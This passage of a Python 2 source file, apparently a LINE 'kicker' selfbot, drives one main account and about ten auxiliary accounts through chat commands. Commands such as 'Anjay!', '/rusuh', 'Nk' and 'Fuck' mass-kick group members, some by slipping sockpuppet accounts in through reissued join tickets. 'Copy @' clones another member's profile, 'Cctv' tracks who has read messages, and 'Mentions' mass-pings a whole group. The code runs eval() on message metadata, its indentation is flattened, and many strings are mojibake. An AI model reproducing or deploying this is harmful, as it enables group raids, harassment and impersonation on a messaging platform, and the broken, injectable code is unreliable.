if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Protection QR On")
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:off","Protect off"]:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Protection Disable Off")
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Disable Off")
else:
cl.sendText(msg.to,"Already off")
elif ("Cn: " in msg.text):
if msg.toType == 2:
profile = cl.getProfile()
X = msg.text.replace("Cn: ","")
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to,"Name ~ " + X + " Done")
else:
cl.sendText(msg.to,"Failed")
elif ("1Cn " in msg.text):
if msg.toType == 2:
profile = ki.getProfile()
X = msg.text.replace("1Cn ","")
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to,"name " + X + " done")
else:
ki.sendText(msg.to,"Failed")
elif ("2Cn " in msg.text):
if msg.toType == 2:
profile = kk.getProfile()
X = msg.text.replace("2Cn ","")
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to,"name " + X + " done")
else:
kk.sendText(msg.to,"Failed")
elif ("3Cn " in msg.text):
if msg.toType == 2:
profile = kk.getProfile()
X = msg.text.replace("3Cn ","")
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to,"name " + X + " done")
else:
kk.sendText(msg.to,"Failed")
elif msg.text in ["Mc: "]:
mmid = msg.text.replace("Mc: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オフ","K off","Contact off","顯示:關"]:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オン","Join on","Auto join:on","自動åƒåŠ ï¼šé–‹"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オフ","Join off","Auto join:off","自動åƒåŠ ï¼šé—œ"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif ("Auto cancel: " in msg.text):
try:
strnum = msg.text.replace("Auto cancel: ","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
wait["autoCancel"]["members"] = num
if wait["lang"] == "JP":
    cl.sendText(msg.to,"Groups of " + strnum + " members or fewer will now be declined automatically")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share:on","Share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["共有:オフ","Share:off","Share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Set"]:
md = " ➰「 SETTING 」➰\n ===[™D®∆G0¶™вσт]===\n\n"
if wait["contact"] == True: md+="🔹 Contact → on\n"
else: md+="🔹 Contact → off\n"
if wait["autoJoin"] == True: md+="🔹 Auto join → on\n"
else: md +="🔹 Auto join → off\n"
if wait["autoCancel"]["on"] == True: md+="🔹 Auto cancel → "+ str(wait["autoCancel"]["members"]) + "\n"
else: md+= "🔹 Auto cancel → off\n"
if wait["likeOn"] == True: md+="🔹 Auto Like → on\n"
else: md+="🔹 Auto Like → off\n"
if wait["leaveRoom"] == True: md+="🔹 Auto leave → on\n"
else: md+="🔹 Auto leave → off\n"
if wait["timeline"] == True: md+="🔹 Share → on\n"
else: md+="🔹 Share → off\n"
if wait["autoAdd"] == True: md+="🔹 Auto add → on\n"
else: md+="🔹 Auto add → off\n"
if wait["commentOn"] == True: md+="🔹 Comment → on\n"
else: md+="🔹 Comment → off\n"
if wait["Backup"] == True: md+="🔹 Auto Backup → on\n"
else: md+="🔹 Auto Backup → off\n"
if wait["qr"] == True: md+="🔹 Protect QR : on\n"
else: md+="🔹 Protect QR → off\n"
if wait["protectionOn"] == True: md+="🔹 Protection → on\n"
else: md+="🔹 Protection → off\n"
if wait["welcome"] == True: md+="🔹 Welcome → on\n"
else: md+="🔹 Welcome → off\n"
cl.sendText(msg.to,md + "\n ➰┅═ই❂͡★Amii™┅═ই❂͡✔✔")
elif msg.text in ["Group id","List group"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[🔹] %s \n" % (cl.getGroup(i).name + " :::: " + str(len (cl.getGroup(i).members)))
cl.sendText(msg.to, "==== [MY GROUPS] ====\n\n"+ h +"\n TOTAL GROUPS : " +str(len(gid)))
elif msg.text in ["Cancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif msg.text in ["Cancelall1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"All invitations have been refused")
else:
ki.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif msg.text in ["Cancelall2"]:
gid = kk.getGroupIdsInvited()
for i in gid:
kk.rejectGroupInvitation(i)
if wait["lang"] == "JP":
kk.sendText(msg.to,"All invitations have been refused")
else:
kk.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif msg.text in ["Backup on","backup:on"]:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Backup On")
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Backup off","backup:off"]:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Backup Off")
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Auto like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
elif msg.text in ["Auto like off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif "My message" in msg.text:
cl.sendText(msg.to,"Your message ⤵\n\n" + str(wait["message"]))
elif "Message set: " in msg.text:
m = msg.text.replace("Message set: ","")
if m in [""," ","\n",None]:
cl.sendText(msg.to,"Error")
else:
wait["message"] = m
cl.sendText(msg.to,"Changed ⤵\n\n" + m)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Error")
else:
wait["comment"] = c
cl.sendText(msg.to,"Changed ⤵\n\n" + c)
elif msg.text in ["Comment on","Comment:on","自動首é 留言:開"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["コメント:オフ","Comment:off","Comment off","自動首é 留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Welcome on"]:
if wait["welcome"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
wait["welcome"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome off"]:
if wait["welcome"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["welcome"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
elif msg.text in ["My comment","留言確èª"]:
cl.sendText(msg.to,"Your comment ⤵\n\n" + str(wait["comment"]))
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u78e5efff85bf97393cc2c4b8ecf93d25'}
cl.sendMessage(msg)
cl.sendText(msg.to, "My creator ⤴")
random.choice(KIL).sendText(msg.to, "My creator ⤴")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["2gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "[]" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,".")
else:
cl.sendText(msg.to,"Please turn on the name clock.")
#-----------------------------------------------
elif msg.text == "Cctv":
cl.sendText(msg.to, "Check in a readPoint")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
print wait2
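# How the read-point works, in brief: "Cctv" pins the current message id
# as a marker; receipt events that arrive afterwards append reader names
# to wait2['readMember'][msg.to], and "Cilubba" reports them. A minimal
# sketch of the receipt side (assumption: op.type is the read-receipt
# event and op.param2 is the reader's mid):
#     if msg.to in wait2['readPoint']:
#         name = cl.getContact(op.param2).displayName
#         wait2['readMember'][msg.to] += "\n" + name
#         wait2['ROM'][msg.to][op.param2] = name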
elif msg.text == "Cilubba":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "People who readed %s\nthat's it\n\nPeople who have ignored reads\n%sIt is abnormal ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n「Cctv」you can send ♪ read point will be created ♪")
#-----------------------------------------------
elif "Maaf! " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Maaf! ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kc.kickoutFromGroup(msg.to,[target])
kc.leaveGroup(msg.to)
cl.updateGroup(G)
print (msg.to,[target])
except:
ki.sendText(msg.to,"Succes ")
kk.sendText(msg.to,"Bye")
elif "Sorry!! " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Sorry!! ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kk.kickoutFromGroup(msg.to,[target])
kk.leaveGroup(msg.to)
cl.updateGroup(G)
print (msg.to,[target])
except:
ki.sendText(msg.to,"Succes ")
kk.sendText(msg.to,"Bye")
#-----------------------------------------------
elif msg.text in ["Masuk beb"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kd.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
ke.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kf.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kg.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kh.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kj.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kk.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
kk.updateGroup(G)
elif msg.text in ["Kuy1"]:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = kk.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
elif msg.text in ["Kuy2"]:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
elif msg.text in ["Kuy3"]:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(msg.to)
#-----------------------------------------------
#.acceptGroupInvitationByTicket(msg.to,Ticket)
#-----------------------------------------------
elif msg.text in ["Husss"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
kb.leaveGroup(msg.to)
kd.leaveGroup(msg.to)
ke.leaveGroup(msg.to)
kf.leaveGroup(msg.to)
kg.leaveGroup(msg.to)
kh.leaveGroup(msg.to)
kj.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@left"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Lc @bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Hy @bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
#------------------------[Copy]-------------------------
elif msg.text in ["Backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to,"Backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[Copy]"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Succes")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Fuck"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Bye")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Anjay!" in msg.text:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Anjay!","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
ki.sendText(msg.to,"Just some casual cleansing ")
kk.sendText(msg.to,"Group cleansed.")
kk.sendText(msg.to,"Bye All")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
kk.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg,to,"Group cleanse")
kk.sendText(msg,to,"Group cleanse")
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg.to,"Succes ")
kk.sendText(msg.to,"Bye")
elif "BL @" in msg.text:
_name = msg.text.replace("BL @","")
_kicktarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes ")
except:
cl.sendText(msg.to,"error")
elif "Ban " in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ban0 = msg.text.replace("Ban ","")
ban1 = ban0.lstrip()
ban2 = ban1.replace("@","")
ban3 = ban2.rstrip()
_name = ban3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
except:
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
elif "Mentions" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100  # chunks of 100 members per mention message, matching the slices below
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
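# The MENTION metadata format, for reference: a JSON object whose
# MENTIONEES list maps character spans of msg.text to mids. A minimal
# single-mention sketch (assumption: target_mid holds a valid mid):
#     msg.text = "@user"
#     msg.contentMetadata = {'MENTION': json.dumps(
#         {"MENTIONEES": [{"S": "0", "E": "5", "M": target_mid}]})}
#     cl.sendMessage(msg)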
elif "Unban " in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
unb0 = msg.text.replace("Unban ","")
unb1 = unb0.lstrip()
unb2 = unb1.replace("@","")
unb3 = unb2.rstrip()
x_name = unb3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if x_name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
except:
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
elif "Namelock on" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"Turned on")
else:
cl.sendText(msg.to,"Already on")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock off" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"Turn off")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"Already off")
elif "Mid " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
try:
    cu = cl.channel.getCover(key1)
except:
    cu = ""
try:
cl.sendText(msg.to,"Your mid ⤵\n" + contact.mid)
except:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + str(cu))
elif "/rusuh " in msg.text:
if msg.contentMetadata is not None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
ki.kickoutFromGroup(msg.to,[target])
else:
pass
#-----------------------------------------------
elif msg.text in ["Tes"]:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
N=random.choice(klist)
N.sendText(msg.to,"I am Ready 😎")
#-----------------------------------------------
elif "Say " in msg.text:
string = msg.text.replace("Say ","")
if len(string.decode('utf-8')) <= 50:
ki.sendText(msg.to," " + string + " ")
kk.sendText(msg.to," " + string + " ")
kc.sendText(msg.to," " + string + " ")
kb.sendText(msg.to," " + string + " ")
kd.sendText(msg.to," " + string + " ")
ke.sendText(msg.to," " + string + " ")
kf.sendText(msg.to," " + string + " ")
kg.sendText(msg.to," " + string + " ")
kh.sendText(msg.to," " + string + " ")
kj.sendText(msg.to," " + string + " ")
kk.sendText(msg.to," " + string + " ")
kc.sendText(msg.to," " + string + " ")
#-----------------------------------------------
elif msg.text in ["respon","Respon"]:
ki.sendText(msg.to,"™ 1 Hadiirrr")
kk.sendText(msg.to,"™ 2 Hadirrr")
kc.sendText(msg.to,"™ 3 Hadirrr")
kb.sendText(msg.to,"™ 4 Hadiirrr")
kd.sendText(msg.to,"™ 5 Hadirrr")
ke.sendText(msg.to,"™ 6 Hadirrr")
kg.sendText(msg.to,"™ 7 Hadiirrr")
kh.sendText(msg.to,"™ 8 Hadirrr")
kj.sendText(msg.to,"™ 9 Hadirrr")
kf.sendText(msg.to,"™ 10 Hadiirrr")
kf.sendText(msg.to,"======[ DONE BOS ]======")
#-----------------------------------------------
elif msg.text in ["Your name","your name"]:
G = ki.getProfile()
X = G.displayName
Y = kk.getProfile()
Z = Y.displayName
A = kc.getProfile()
B = A.displayName
ki.sendText(msg.to,X)
kk.sendText(msg.to,Z)
kc.sendText(msg.to,B)
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#------------------------------------------------------------------
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
# ki.sendText(msg.to,"send contact")
# kk.sendText(msg.to,"send contact")
# kc.sendText(msg.to,"send contact")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
# ki.sendText(msg.to,"send contact")
# kk.sendText(msg.to,"send contact")
# kc.sendText(msg.to,"send contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
# ki.sendText(msg.to,"nothing")
# kk.sendText(msg.to,"nothing")
# kc.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
